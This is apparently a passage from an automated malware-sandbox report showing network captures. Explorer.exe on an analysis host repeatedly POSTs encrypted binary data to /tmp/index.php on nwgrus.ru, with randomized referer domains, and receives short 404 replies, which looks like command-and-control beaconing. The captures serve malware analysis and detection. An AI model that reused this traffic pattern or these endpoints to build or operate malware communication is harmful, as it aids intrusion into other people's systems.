                                                                                      Oct 1, 2024 15:19:16.951466084 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://whtwvxqhovvmi.org/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Length: 349
                                                                                      Host: nwgrus.ru
                                                                                      Oct 1, 2024 15:19:16.951493979 CEST349OUTData Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 34 58 a2 ad
                                                                                      Data Ascii: ;n&`&u|bt5oZ]Rm? 9Yt M@NA .[k,vu4X[IrZdY{=Vjs5wzo ;<]M ZpFGL/!mc,P>_rL'Z4rHcx12Eff#[_)
                                                                                      Oct 1, 2024 15:19:18.036545992 CEST151INHTTP/1.1 404 Not Found
                                                                                      Server: nginx/1.26.0
                                                                                      Date: Tue, 01 Oct 2024 13:19:17 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Connection: close
                                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                                      Data Ascii: r


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      30192.168.2.44976778.89.199.216802580C:\Windows\explorer.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 1, 2024 15:19:22.190469027 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://dyfmjstgfwohx.net/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Length: 287
                                                                                      Host: nwgrus.ru
                                                                                      Oct 1, 2024 15:19:22.190493107 CEST287OUTData Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 29 17 de bb
                                                                                      Data Ascii: ;n&`&u|bt5oZ]Rm? 9Yt M@NA .[k,vu)2FjtLP<gamVX_n33d7F&bi2={!\:W&wo7I\!2t9vtav?c9iq<zd
                                                                                      Oct 1, 2024 15:19:23.665653944 CEST151INHTTP/1.1 404 Not Found
                                                                                      Server: nginx/1.26.0
                                                                                      Date: Tue, 01 Oct 2024 13:19:23 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Connection: close
                                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                                      Data Ascii: r
                                                                                      Oct 1, 2024 15:19:23.665740013 CEST151INHTTP/1.1 404 Not Found
                                                                                      Server: nginx/1.26.0
                                                                                      Date: Tue, 01 Oct 2024 13:19:23 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Connection: close
                                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                                      Data Ascii: r


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      31192.168.2.44976878.89.199.216802580C:\Windows\explorer.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 1, 2024 15:19:28.939738989 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://kwsghrqhqvcg.org/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Length: 151
                                                                                      Host: nwgrus.ru
                                                                                      Oct 1, 2024 15:19:28.939748049 CEST151OUTData Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5a 34 be b8
                                                                                      Data Ascii: ;n&`&u|bt5oZ]Rm? 9Yt M@NA .[k,vuZ4uHddB1VPC>7pas7W?Z*qNT+gAjU
                                                                                      Oct 1, 2024 15:19:30.039554119 CEST151INHTTP/1.1 404 Not Found
                                                                                      Server: nginx/1.26.0
                                                                                      Date: Tue, 01 Oct 2024 13:19:29 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Connection: close
                                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                                      Data Ascii: r


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      32192.168.2.44976978.89.199.216802580C:\Windows\explorer.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 1, 2024 15:19:34.504096031 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://ccplyqsjscjfnfid.org/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Length: 139
                                                                                      Host: nwgrus.ru
                                                                                      Oct 1, 2024 15:19:34.504173040 CEST139OUTData Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2c 28 e3 f5
                                                                                      Data Ascii: ;n&`&u|bt5oZ]Rm? 9Yt M@NA .[k,vu,(*}{O]Jr-'V#(Q#Q,C
                                                                                      Oct 1, 2024 15:19:35.601290941 CEST151INHTTP/1.1 404 Not Found
                                                                                      Server: nginx/1.26.0
                                                                                      Date: Tue, 01 Oct 2024 13:19:35 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Connection: close
                                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                                      Data Ascii: r


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      33192.168.2.44977078.89.199.216802580C:\Windows\explorer.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 1, 2024 15:19:41.191082954 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://lqtuaptcsfhre.org/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Length: 331
                                                                                      Host: nwgrus.ru
                                                                                      Oct 1, 2024 15:19:41.191118002 CEST331OUTData Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 33 38 ed ff
                                                                                      Data Ascii: ;n&`&u|bt5oZ]Rm? 9Yt M@NA .[k,vu38ENL5\L5%i_|AFTXb;X`(Ga5L/sE]{h[y\#@{H>p0Hc$\(O.
                                                                                      Oct 1, 2024 15:19:42.320750952 CEST151INHTTP/1.1 404 Not Found
                                                                                      Server: nginx/1.26.0
                                                                                      Date: Tue, 01 Oct 2024 13:19:42 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Connection: close
                                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                                      Data Ascii: r


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      34192.168.2.44977178.89.199.216802580C:\Windows\explorer.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 1, 2024 15:19:46.695696115 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://dfuclvkubxc.com/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Length: 316
                                                                                      Host: nwgrus.ru
                                                                                      Oct 1, 2024 15:19:46.695724010 CEST316OUTData Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 49 54 b3 82
                                                                                      Data Ascii: ;n&`&u|bt5oZ]Rm? 9Yt M@NA .[k,vuITo`dvLo i(G*?y:q< no'+7l}@ |\Or:'zD6V:K>2*@f@muCAeSV0g
                                                                                      Oct 1, 2024 15:19:47.790616989 CEST151INHTTP/1.1 404 Not Found
                                                                                      Server: nginx/1.26.0
                                                                                      Date: Tue, 01 Oct 2024 13:19:47 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Connection: close
                                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                                      Data Ascii: r


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      35192.168.2.449772187.131.253.169802580C:\Windows\explorer.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 1, 2024 15:19:55.290777922 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://utvluvviohegxwa.org/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Length: 160
                                                                                      Host: nwgrus.ru
                                                                                      Oct 1, 2024 15:19:55.290815115 CEST160OUTData Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 28 0b d8 f6
                                                                                      Data Ascii: ;n&`&u|bt5oZ]Rm? 9Yt M@NA .[k,vu(md[eMctXCHs/A~{x9>40HIz\yM<E
                                                                                      Oct 1, 2024 15:19:56.389751911 CEST151INHTTP/1.1 404 Not Found
                                                                                      Server: nginx/1.26.0
                                                                                      Date: Tue, 01 Oct 2024 13:19:56 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Connection: close
                                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                                      Data Ascii: r


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      36192.168.2.449773187.131.253.169802580C:\Windows\explorer.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 1, 2024 15:20:01.062087059 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://gciivaguamcfaiv.net/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Length: 326
                                                                                      Host: nwgrus.ru
                                                                                      Oct 1, 2024 15:20:01.062105894 CEST326OUTData Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 41 17 c9 a6
                                                                                      Data Ascii: ;n&`&u|bt5oZ]Rm? 9Yt M@NA .[k,vuA_Ieuhzl|Ymz2Po6W2X!}8X"BYC(1%7E5J\)a)"@:/nqN!+n+M<-
                                                                                      Oct 1, 2024 15:20:02.020612955 CEST151INHTTP/1.1 404 Not Found
                                                                                      Server: nginx/1.26.0
                                                                                      Date: Tue, 01 Oct 2024 13:20:01 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Connection: close
                                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                                      Data Ascii: r


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      37192.168.2.449774187.131.253.169802580C:\Windows\explorer.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 1, 2024 15:20:06.362241030 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://pdfnugwkpxwacgj.org/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Length: 355
                                                                                      Host: nwgrus.ru
                                                                                      Oct 1, 2024 15:20:06.362256050 CEST355OUTData Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 65 07 a5 f0
                                                                                      Data Ascii: ;n&`&u|bt5oZ]Rm? 9Yt M@NA .[k,vue}OXG1rM|'|WD>UwSVMI%,Uv[W'IZ@9FlGs$^aW9Xw+ENkRm`]E
                                                                                      Oct 1, 2024 15:20:07.324738026 CEST151INHTTP/1.1 404 Not Found
                                                                                      Server: nginx/1.26.0
                                                                                      Date: Tue, 01 Oct 2024 13:20:07 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Connection: close
                                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                                      Data Ascii: r


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      38192.168.2.449775187.131.253.169802580C:\Windows\explorer.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 1, 2024 15:20:12.458080053 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://dxlshxkdsvnwfeb.org/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Length: 224
                                                                                      Host: nwgrus.ru
                                                                                      Oct 1, 2024 15:20:12.458101034 CEST224OUTData Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7e 3a b4 a9
                                                                                      Data Ascii: ;n&`&u|bt5oZ]Rm? 9Yt M@NA .[k,vu~:/QaTVOs*b8w53gQMuRL)Y|w"_lOOp8W`_/:3X*5C@hl
                                                                                      Oct 1, 2024 15:20:13.530782938 CEST151INHTTP/1.1 404 Not Found
                                                                                      Server: nginx/1.26.0
                                                                                      Date: Tue, 01 Oct 2024 13:20:13 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Connection: close
                                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                                      Data Ascii: r


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      39192.168.2.449776187.131.253.169802580C:\Windows\explorer.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 1, 2024 15:20:17.967247009 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://snihbsmchoau.org/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Length: 183
                                                                                      Host: nwgrus.ru
                                                                                      Oct 1, 2024 15:20:17.967266083 CEST183OUTData Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3c 09 b5 8f
                                                                                      Data Ascii: ;n&`&u|bt5oZ]Rm? 9Yt M@NA .[k,vu<IA[f;(j:5ayGo)5DYP. E=3CBS}[,"`I?y0IL+
                                                                                      Oct 1, 2024 15:20:19.523677111 CEST151INHTTP/1.1 404 Not Found
                                                                                      Server: nginx/1.26.0
                                                                                      Date: Tue, 01 Oct 2024 13:20:18 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Connection: close
                                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                                      Data Ascii: r
                                                                                      Oct 1, 2024 15:20:19.523772001 CEST151INHTTP/1.1 404 Not Found
                                                                                      Server: nginx/1.26.0
                                                                                      Date: Tue, 01 Oct 2024 13:20:18 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Connection: close
                                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                                      Data Ascii: r


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      40192.168.2.449777187.131.253.169802580C:\Windows\explorer.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 1, 2024 15:20:24.682240009 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://saahpawkqkmb.com/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Length: 238
                                                                                      Host: nwgrus.ru
                                                                                      Oct 1, 2024 15:20:24.682265997 CEST238OUTData Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 22 44 d5 e4
                                                                                      Data Ascii: ;n&`&u|bt5oZ]Rm? 9Yt M@NA .[k,vu"DeVxJ%PeE@nkrW:|+d8BGl2(@m~52d~7G/`(f2rH_7}:q,DYbFm$n
                                                                                      Oct 1, 2024 15:20:25.647753954 CEST151INHTTP/1.1 404 Not Found
                                                                                      Server: nginx/1.26.0
                                                                                      Date: Tue, 01 Oct 2024 13:20:25 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Connection: close
                                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                                      Data Ascii: r


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      41192.168.2.449778187.131.253.169802580C:\Windows\explorer.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 1, 2024 15:20:30.557919025 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://nuocycmfgie.org/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Length: 155
                                                                                      Host: nwgrus.ru
                                                                                      Oct 1, 2024 15:20:30.557948112 CEST155OUTData Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 77 1c c7 9d
                                                                                      Data Ascii: ;n&`&u|bt5oZ]Rm? 9Yt M@NA .[k,vuwU%\vb|LH]Vx`%g'IQe:-Dh92NfYP
                                                                                      Oct 1, 2024 15:20:31.521358967 CEST151INHTTP/1.1 404 Not Found
                                                                                      Server: nginx/1.26.0
                                                                                      Date: Tue, 01 Oct 2024 13:20:31 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Connection: close
                                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                                      Data Ascii: r


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      42192.168.2.449779187.131.253.169802580C:\Windows\explorer.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 1, 2024 15:20:35.217917919 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://vjpuynmuynejyil.com/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Length: 192
                                                                                      Host: nwgrus.ru
                                                                                      Oct 1, 2024 15:20:35.217932940 CEST192OUTData Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 33 33 a0 9c
                                                                                      Data Ascii: ;n&`&u|bt5oZ]Rm? 9Yt M@NA .[k,vu33)hZDfi6d338J jJ,>'^KOOZ*)eY;KCZ_m
                                                                                      Oct 1, 2024 15:20:36.199208021 CEST151INHTTP/1.1 404 Not Found
                                                                                      Server: nginx/1.26.0
                                                                                      Date: Tue, 01 Oct 2024 13:20:36 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Connection: close
                                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                                      Data Ascii: r


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      43192.168.2.449780187.131.253.169802580C:\Windows\explorer.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 1, 2024 15:20:40.145922899 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://sbfilscmpife.com/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Length: 187
                                                                                      Host: nwgrus.ru
                                                                                      Oct 1, 2024 15:20:40.145936966 CEST187OUTData Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 52 1d cf ab
                                                                                      Data Ascii: ;n&`&u|bt5oZ]Rm? 9Yt M@NA .[k,vuR=yqVntZ$<?0r0=(:2wy>5KMvJU*roL]'BfQS3
                                                                                      Oct 1, 2024 15:20:41.110836983 CEST151INHTTP/1.1 404 Not Found
                                                                                      Server: nginx/1.26.0
                                                                                      Date: Tue, 01 Oct 2024 13:20:40 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Connection: close
                                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                                      Data Ascii: r


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      44192.168.2.449781187.131.253.169802580C:\Windows\explorer.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 1, 2024 15:20:46.089329004 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://nylkqgrfrnt.org/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Length: 187
                                                                                      Host: nwgrus.ru
                                                                                      Oct 1, 2024 15:20:46.089354038 CEST187OUTData Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7d 1b aa 9f
                                                                                      Data Ascii: ;n&`&u|bt5oZ]Rm? 9Yt M@NA .[k,vu}XWYKY_?I`>nU$zy T/U*pAE)W@qRo<)8bp3
                                                                                      Oct 1, 2024 15:20:47.770889997 CEST151INHTTP/1.1 404 Not Found
                                                                                      Server: nginx/1.26.0
                                                                                      Date: Tue, 01 Oct 2024 13:20:46 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Connection: close
                                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                                      Data Ascii: r
                                                                                      Oct 1, 2024 15:20:47.771214008 CEST151INHTTP/1.1 404 Not Found
                                                                                      Server: nginx/1.26.0
                                                                                      Date: Tue, 01 Oct 2024 13:20:46 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Connection: close
                                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                                      Data Ascii: r
                                                                                      Oct 1, 2024 15:20:47.771483898 CEST151INHTTP/1.1 404 Not Found
                                                                                      Server: nginx/1.26.0
                                                                                      Date: Tue, 01 Oct 2024 13:20:46 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Connection: close
                                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                                      Data Ascii: r


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      45192.168.2.449782187.131.253.169802580C:\Windows\explorer.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 1, 2024 15:20:52.905045986 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://gnxmthbmvqq.org/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Length: 222
                                                                                      Host: nwgrus.ru
                                                                                      Oct 1, 2024 15:20:52.905060053 CEST222OUTData Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5c 3c aa 9c
                                                                                      Data Ascii: ;n&`&u|bt5oZ]Rm? 9Yt M@NA .[k,vu\<QQ*cF!}~i=>9VNx)^5:tMEEY)B-p0MUU0{FH,3R7'[5
                                                                                      Oct 1, 2024 15:20:54.025105953 CEST151INHTTP/1.1 404 Not Found
                                                                                      Server: nginx/1.26.0
                                                                                      Date: Tue, 01 Oct 2024 13:20:53 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Connection: close
                                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                                      Data Ascii: r


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      46192.168.2.449783187.131.253.169802580C:\Windows\explorer.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 1, 2024 15:20:58.534616947 CEST280OUTPOST /tmp/index.php HTTP/1.1
